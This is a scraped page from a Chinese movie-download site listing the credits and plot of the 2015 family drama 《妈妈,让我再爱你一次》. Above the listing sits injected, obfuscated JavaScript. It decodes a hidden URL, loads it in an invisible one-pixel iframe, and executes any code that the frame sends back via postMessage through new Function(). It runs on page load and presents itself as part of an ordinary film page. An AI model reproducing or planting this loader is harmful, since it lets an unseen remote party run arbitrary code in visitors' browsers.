if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 

妈妈,让我再爱你一次

资源:

类型:剧情片 剧情 家庭 2015

.

《妈妈,让我再爱你一次》迅雷下载

《妈妈,让我再爱你一次》剧情介绍

妈妈,让我再爱你一次影片剧照1

影片导演: 孙爱国 / 韩风

影片编剧: 孙爱国

影片主演: 李权霖 / 李凤鸣 / 邱林 / 韩风 / 吴谢枫 / 柳政越 / 潘翎嘉 / 祝磊 / 付美玲

影片类型: 剧情 / 家庭

影片制片国家/地区: 中国大陆

影片语言: 汉语普通话

影片上映日期: 2015-10-10(中国大陆)

影片片长: 92分钟

影片又名: 妈妈让我再爱你一次 / Mom, Let Me Love You Once Again

影片简介:母亲,这个字眼是多么地神圣啊,她用自己的汗水抚养孩子们长大,付出了一生的精力。电影中的六年级学生韩飞(李权霖 饰)是个品学兼优的孩子,然而,在车祸发生的那一刹那,他再也见不到他的母亲,但生命中却依旧有一股莫名的母爱围绕着他,那就是他的继母。

父亲(邱林 饰)怕影响孩子学业,以离婚为由隐瞒着韩飞,这时继母的出现无疑是加深韩飞对自己的恨,直到某一天,韩飞知道了真相,也就慢慢地接受继母了,尤其是在韩飞生日那天.....母爱,就这样又在他的生命中不断地环绕着。

妈妈,让我再爱你一次影片剧照2

妈妈,让我再爱你一次影片剧照3

妈妈,让我再爱你一次影片剧照4


Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved